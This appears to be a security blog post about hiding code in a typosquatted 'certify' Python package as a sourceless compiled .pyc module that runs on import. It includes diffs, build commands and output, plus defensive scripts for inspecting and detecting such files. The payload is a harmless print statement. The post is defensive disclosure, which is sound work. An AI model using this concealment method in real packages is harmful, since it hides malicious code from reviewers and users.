Compiled Python Files

A mirror reflects an image that looks correct but obscures the real scene behind it
Photo by Rishabh Dharmani / Unsplash
This is part of a series of posts examining the methods by which malicious Python code gains execution.

This technique is primarily about obfuscating malicious Python code, but it also demonstrates a non-standard way for that code to gain execution. Compiled Python modules (*.pyc files) can be imported just like plaintext modules, but they are harder to analyze because they must be decompiled or disassembled to discern their true intent.
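To make the analysis cost concrete, the following is a minimal sketch of how a reviewer might peek inside a compiled module using only the standard library. The helper names (load_code_from_pyc, summarize_pyc, demo) and the stand-in sample.py are illustrative assumptions, and the 16-byte header size assumes a CPython 3.7+ file as described by PEP 552. It only works when the inspecting interpreter matches the one that produced the file.

```python
import dis
import io
import marshal
import pathlib
import py_compile
import tempfile

# Assumption: CPython 3.7+ layout (magic, flags, then 8 bytes of
# mtime/size or source hash), per PEP 552.
PYC_HEADER_SIZE = 16


def load_code_from_pyc(pyc_path):
    """Return the module-level code object stored in a .pyc file."""
    data = pathlib.Path(pyc_path).read_bytes()
    # marshal can only decode bytecode written by a matching interpreter.
    return marshal.loads(data[PYC_HEADER_SIZE:])


def summarize_pyc(pyc_path):
    """Collect the names, constants, and disassembly a reviewer would skim."""
    code = load_code_from_pyc(pyc_path)
    listing = io.StringIO()
    dis.dis(code, file=listing)
    return code.co_names, code.co_consts, listing.getvalue()


def demo():
    """Compile a harmless stand-in module and summarize the result."""
    with tempfile.TemporaryDirectory() as tmp:
        source = pathlib.Path(tmp) / "sample.py"
        source.write_text('print("[!] Malware could have run here")\n')
        pyc = pathlib.Path(tmp) / "sample.pyc"
        py_compile.compile(str(source), cfile=str(pyc), doraise=True)
        return summarize_pyc(pyc)


if __name__ == "__main__":
    names, consts, listing = demo()
    print("names: ", names)
    print("consts:", consts)
    print(listing)
```

Strings and imported names survive compilation, so a quick look at co_names and co_consts is often a useful first pass before reaching for a full decompiler.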


PEP 3147 describes how compiled Python modules are created, stored, and used. It provides this hint as to how they can be leveraged for malicious purposes:

For backward compatibility, Python will still support pyc-only distributions, however it will only do so when the pyc file lives in the directory where the py file would have been, i.e. not in the __pycache__ directory. [A] pyc file outside of __pycache__ will only be imported if the py source file is missing.

This legacy support path, highlighted below in the flowchart provided by PEP 3147, can be used to create packages with obfuscated intent.

Flowchart describing how Python modules are loaded, with highlighted legacy support path
Highlighted legacy compiled Python module import support path
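The legacy path can be observed in isolation with a short, harmless experiment. This is a sketch under stated assumptions: the module name legacy_demo and the helper import_sourceless_demo are made up for illustration, and the compiled file is produced by the same interpreter that imports it.

```python
import importlib
import pathlib
import py_compile
import sys
import tempfile


def import_sourceless_demo():
    """Import a module that exists only as a .pyc next to where its .py would be."""
    with tempfile.TemporaryDirectory() as tmp:
        source = pathlib.Path(tmp) / "legacy_demo.py"
        source.write_text("VALUE = 42\n")

        # Write the bytecode beside the source instead of into __pycache__.
        py_compile.compile(
            str(source), cfile=str(source.with_suffix(".pyc")), doraise=True
        )

        # Per PEP 3147, the legacy .pyc is only used when the source is missing.
        source.unlink()

        sys.path.insert(0, tmp)
        try:
            importlib.invalidate_caches()
            module = importlib.import_module("legacy_demo")
        finally:
            sys.path.remove(tmp)
            sys.modules.pop("legacy_demo", None)

        return module.VALUE, pathlib.Path(module.__file__).name


if __name__ == "__main__":
    print(import_sourceless_demo())  # (42, 'legacy_demo.pyc')
```

The module's __file__ attribute points at the .pyc file itself, which is one quick signal that an imported module has no source behind it.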

The basic process can be illustrated by starting with the same spoofed certify package from an earlier entry in this blog series. Start by creating the malware in a plaintext Python module:

❯ cat certifi/sneaky.py
# The content in this module will only be
# provided in compiled form (*.pyc file).
print("[!] Malware could have run here")

Create a plaintext "malicious" Python payload

Then, ensure the module is called. In this case, we add a standard import statement in the core module, which should execute for all uses of this package.

❯ git diff certifi/core.py
diff --git a/certifi/core.py b/certifi/core.py
index 91f538b..ae4d699 100644
--- a/certifi/core.py
+++ b/certifi/core.py
@@ -6,6 +6,7 @@ This module returns the installation location of cacert.pem or its contents.
 """
 import sys
 import atexit
+from . import sneaky

 def exit_cacert_ctx() -> None:
     _CACERT_CTX.__exit__(None, None, None)  # type: ignore[union-attr]

Importing the "malicious" module will cause its payload to run

Next, compile the source module and remove the original:

## The `-b` option will "use legacy (pre-PEP3147) compiled file locations"
❯ python -m compileall -b certifi/sneaky.py
Compiling 'certifi/sneaky.py'...

## Ensure the matching source module is removed
❯ rm certifi/sneaky.py

## See that the sneaky module only exists in compiled form
❯ ls -alh certifi
total 616
drwxr-xr-x  10 maxrake  staff   320B Apr 16 11:36 .
drwxr-xr-x  16 maxrake  staff   512B Apr 16 11:32 ..
-rw-r--r--   1 maxrake  staff    94B Apr 10 18:07 __init__.py
-rw-r--r--   1 maxrake  staff   243B Apr  9 10:20 __main__.py
-rw-r--r--   1 maxrake  staff   286K Apr  9 10:20 cacert.pem
-rw-r--r--   1 maxrake  staff   4.3K Apr 16 09:37 core.py
-rw-r--r--   1 maxrake  staff     0B Apr  9 10:20 py.typed
-rw-r--r--   1 maxrake  staff   178B Apr 16 11:36 sneaky.pyc
drwxr-xr-x   4 maxrake  staff   128B Apr  9 10:20 tests

Use the compileall standard library module to create the .pyc file
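The same step can be driven from Python rather than the command line. The sketch below assumes a hypothetical helper named compile_to_legacy_pyc and runs against a throwaway copy of the stand-in payload in a temporary directory; the legacy=True argument of compileall.compile_file corresponds to the -b option shown above.

```python
import compileall
import pathlib
import tempfile


def compile_to_legacy_pyc(source, remove_source=True):
    """Compile one module to a legacy-location .pyc, optionally deleting the source."""
    source = pathlib.Path(source)
    # legacy=True writes <name>.pyc beside the source, like `compileall -b`.
    ok = compileall.compile_file(str(source), force=True, quiet=1, legacy=True)
    if not ok:
        raise RuntimeError(f"failed to compile {source}")
    if remove_source:
        source.unlink()
    return source.with_suffix(".pyc")


def demo():
    """Show the directory contents after compiling and removing the source."""
    with tempfile.TemporaryDirectory() as tmp:
        source = pathlib.Path(tmp) / "sneaky.py"
        source.write_text('print("[!] Malware could have run here")\n')
        compile_to_legacy_pyc(source)
        return sorted(path.name for path in pathlib.Path(tmp).iterdir())


if __name__ == "__main__":
    print(demo())  # ['sneaky.pyc']
```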

Finally, update the package_data entry in setup.py to ensure *.pyc files are included in the distribution:

❯ git diff setup.py
diff --git a/setup.py b/setup.py
index 4313c16..3477e9f 100755
--- a/setup.py
+++ b/setup.py
@@ -24,7 +24,7 @@ with open("certifi/__init__.py") as f:
         raise RuntimeError("No version number found!")

 setup(
-    name="certifi",
+    name="certify",
     version=VERSION,
     description="Python package for providing Mozilla's CA Bundle.",
     long_description=open("README.rst").read(),
@@ -35,7 +35,7 @@ setup(
         "certifi",
     ],
     package_dir={"certifi": "certifi"},
-    package_data={"certifi": ["*.pem", "py.typed"]},
+    package_data={"certifi": ["*.pem", "py.typed", "*.pyc"]},
     # data_files=[('certifi', ['certifi/cacert.pem'])],
     include_package_data=True,
     zip_safe=False,

Inclusion of *.pyc files in packages could be viewed as suspicious
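That suspicion can be turned into a simple check. The following is a rough sketch, not a complete detector: the function names find_sourceless_pyc and scan_sdist are hypothetical, and the rule it applies (flag any .pyc outside __pycache__ that has no sibling .py) is an assumption derived from the PEP 3147 behavior quoted earlier.

```python
import tarfile
from pathlib import PurePosixPath


def find_sourceless_pyc(names):
    """Return archive members that are importable .pyc files with no matching .py."""
    normalized = {str(PurePosixPath(name)) for name in names}
    flagged = []
    for name in sorted(normalized):
        path = PurePosixPath(name)
        # Files inside __pycache__ are never imported without their source.
        if path.suffix != ".pyc" or "__pycache__" in path.parts:
            continue
        if str(path.with_suffix(".py")) not in normalized:
            flagged.append(name)
    return flagged


def scan_sdist(fileobj):
    """Scan an opened source distribution tarball for sourceless .pyc files."""
    with tarfile.open(fileobj=fileobj, mode="r:*") as archive:
        return find_sourceless_pyc(archive.getnames())


if __name__ == "__main__":
    members = [
        "certify-2024.2.2/certifi/__init__.py",
        "certify-2024.2.2/certifi/core.py",
        "certify-2024.2.2/certifi/sneaky.pyc",
    ]
    print(find_sourceless_pyc(members))
    # ['certify-2024.2.2/certifi/sneaky.pyc']
```

To scan a real archive, open it in binary mode and pass the file object to scan_sdist.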

The source distribution will now contain sneaky.pyc, whose obfuscated malicious contents are executed when the certifi package is used:

## Build the source distribution
❯ python setup.py sdist
/Users/maxrake/dev/phylum/python-certify/.venv/lib/python3.12/site-packages/setuptools/dist.py:318: InformationOnly: Normalizing '2024.02.02' to '2024.2.2'
  self.metadata.version = self._normalize_version(self.metadata.version)
running sdist
running egg_info
writing certify.egg-info/PKG-INFO
writing dependency_links to certify.egg-info/dependency_links.txt
writing top-level names to certify.egg-info/top_level.txt
reading manifest file 'certify.egg-info/SOURCES.txt'
reading manifest template 'MANIFEST.in'
warning: no previously-included files found matching '.github/'
warning: manifest_maker: MANIFEST.in, line 4: 'recursive-exclude' expects <dir> <pattern1> <pattern2> ...
adding license file 'LICENSE'
writing manifest file 'certify.egg-info/SOURCES.txt'
running check
creating certify-2024.2.2
creating certify-2024.2.2/certifi
creating certify-2024.2.2/certify.egg-info
copying files to certify-2024.2.2...
copying LICENSE -> certify-2024.2.2
copying MANIFEST.in -> certify-2024.2.2
copying README.rst -> certify-2024.2.2
copying setup.py -> certify-2024.2.2
copying certifi/__init__.py -> certify-2024.2.2/certifi
copying certifi/__main__.py -> certify-2024.2.2/certifi
copying certifi/cacert.pem -> certify-2024.2.2/certifi
copying certifi/core.py -> certify-2024.2.2/certifi
copying certifi/py.typed -> certify-2024.2.2/certifi
copying certifi/sneaky.pyc -> certify-2024.2.2/certifi
copying certify.egg-info/PKG-INFO -> certify-2024.2.2/certify.egg-info
copying certify.egg-info/SOURCES.txt -> certify-2024.2.2/certify.egg-info
copying certify.egg-info/dependency_links.txt -> certify-2024.2.2/certify.egg-info
copying certify.egg-info/not-zip-safe -> certify-2024.2.2/certify.egg-info
copying certify.egg-info/top_level.txt -> certify-2024.2.2/certify.egg-info
copying certify.egg-info/SOURCES.txt -> certify-2024.2.2/certify.egg-info
Writing certify-2024.2.2/setup.cfg
Creating tar archive
removing 'certify-2024.2.2' (and everything under it)

## Install the source distribution
❯ python -m pip install dist/certify-2024.2.2.tar.gz
Processing ./dist/certify-2024.2.2.tar.gz
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Installing backend dependencies ... done
  Preparing metadata (pyproject.toml) ... done
Building wheels for collected packages: certify
  Building wheel for certify (pyproject.toml) ... done
  Created wheel for certify: filename=certify-2024.2.2-py3-none-any.whl size=164098 sha256=51b017049c2c11931217a2449845361a1f6c60c829edd002465ad22a1e071d4a
  Stored in directory: /Users/maxrake/Library/Caches/pip/wheels/43/8d/c9/91f4cd154b7df7fbc77d07b6d2012a4f0b9a289da49d46706d
Successfully built certify
Installing collected packages: certify
Successfully installed certify-2024.2.2

## See that the "malicious code" runs upon importing the package
❯ python
Python 3.12.2 (main, Feb 14 2024, 10:56:22) [Clang 15.0.0 (clang-1500.1.0.2.5)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> import certifi
[!] Malware could have run here
>>>

The malicious payload does not run on package installation but does run on import

This technique is limited in that *.pyc files are specific to the Python version for which they were compiled. For instance, the source distribution in the example above was built with CPython 3.12 and fails when used in an environment with a different version:

## Create a Python 3.11 virtual environment
❯ python3.11 -m venv py311_venv

## Show that commands executed from it use Python v3.11.9
❯ py311_venv/bin/python --version
Python 3.11.9

## Install the source distribution package in the environment
❯ py311_venv/bin/python -m pip install dist/certify-2024.2.2.tar.gz
Processing ./dist/certify-2024.2.2.tar.gz
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Installing backend dependencies ... done
  Preparing metadata (pyproject.toml) ... done
Building wheels for collected packages: certify
  Building wheel for certify (pyproject.toml) ... done
  Created wheel for certify: filename=certify-2024.2.2-py3-none-any.whl size=164098 sha256=5883a681d7835688093fb00f576b72f3af3e1b434de71cef41d144c2fc8e4f5f
  Stored in directory: /Users/maxrake/Library/Caches/pip/wheels/48/f3/55/0b5be9a360ee3586f81a14846268ba7b47db0e122e702650c6
Successfully built certify
Installing collected packages: certify
Successfully installed certify-2024.2.2

## See that attempting to import the package fails
❯ py311_venv/bin/python
Python 3.11.9 (main, Apr  8 2024, 08:53:08) [Clang 15.0.0 (clang-1500.3.9.4)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> import certifi
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/Users/maxrake/dev/phylum/python-certify/certifi/__init__.py", line 1, in <module>
    from .core import contents, where
  File "/Users/maxrake/dev/phylum/python-certify/certifi/core.py", line 9, in <module>
    from . import sneaky
ImportError: bad magic number in 'certifi.sneaky': b'\xcb\r\r\n'
>>>

Compiled Python modules can only run on matching interpreter versions
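The "bad magic number" in the traceback is the first four bytes of the .pyc file, which the import system compares against the value baked into the running interpreter. A minimal sketch of that comparison follows; the helper names are illustrative, and the demo compiles a throwaway module so that the check is expected to pass.

```python
import importlib.util
import pathlib
import py_compile
import tempfile


def read_pyc_magic(pyc_path):
    """Return the 4-byte magic number at the start of a .pyc file."""
    with open(pyc_path, "rb") as handle:
        return handle.read(4)


def magic_to_int(magic):
    """Decode the little-endian version marker; the last two bytes are CR LF."""
    return int.from_bytes(magic[:2], "little")


def matches_running_interpreter(pyc_path):
    """True if this interpreter would accept the file's magic number."""
    return read_pyc_magic(pyc_path) == importlib.util.MAGIC_NUMBER


def demo():
    """Compile a throwaway module and confirm its magic number matches."""
    with tempfile.TemporaryDirectory() as tmp:
        source = pathlib.Path(tmp) / "sample.py"
        source.write_text("VALUE = 1\n")
        pyc = pathlib.Path(tmp) / "sample.pyc"
        py_compile.compile(str(source), cfile=str(pyc), doraise=True)
        return matches_running_interpreter(pyc)


if __name__ == "__main__":
    # The value from the traceback above, produced by the CPython 3.12 build.
    print(magic_to_int(b"\xcb\r\r\n"))  # 3531
    print(demo())  # True
```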

The solution is to create multiple built distributions, one for each of the targeted Python versions, with matching compiled modules. Instead of a single certify-2024.2.2.tar.gz source distribution, certify-2024.2.2-cp312-none-any.whl and certify-2024.2.2-cp311-none-any.whl wheels would be created for CPython 3.12 and CPython 3.11, respectively. The code for doing so is left as an exercise for the reader.

This technique can be made even stealthier by using importlib from the standard library to dynamically load the compiled module instead of using a standard import statement. Previous reporting describes one such method, used by the malicious package fshec2.
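For reviewers, it helps to recognize what such dynamic loading can look like. The sketch below uses importlib.machinery.SourcelessFileLoader with a harmless module; it is one plausible shape, not necessarily the approach taken by fshec2, and the names load_compiled_module and hidden_demo are made up for illustration.

```python
import importlib.machinery
import importlib.util
import pathlib
import py_compile
import tempfile


def load_compiled_module(name, pyc_path):
    """Load a .pyc from an arbitrary path without any import statement."""
    loader = importlib.machinery.SourcelessFileLoader(name, str(pyc_path))
    spec = importlib.util.spec_from_loader(name, loader)
    module = importlib.util.module_from_spec(spec)
    # Executing the module runs its top-level code, just like a normal import.
    loader.exec_module(module)
    return module


def demo():
    """Compile a harmless module, delete its source, and load the bytecode."""
    with tempfile.TemporaryDirectory() as tmp:
        source = pathlib.Path(tmp) / "hidden_demo.py"
        source.write_text("VALUE = 7\n")
        pyc = pathlib.Path(tmp) / "hidden_demo.pyc"
        py_compile.compile(str(source), cfile=str(pyc), doraise=True)
        source.unlink()
        return load_compiled_module("hidden_demo", pyc).VALUE


if __name__ == "__main__":
    print(demo())  # 7
```

Because nothing here is a literal import of the compiled module, a search for import statements alone would miss it; references to importlib.machinery or exec_module in a package that also ships .pyc files deserve a closer look.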

Charles Coggins

Senior Software Engineer, responsible for integrations and author of the "phylum" Python package. Documentation and quality champion, runner, baseball and scout dad, pod-faster, and lover of outdoors.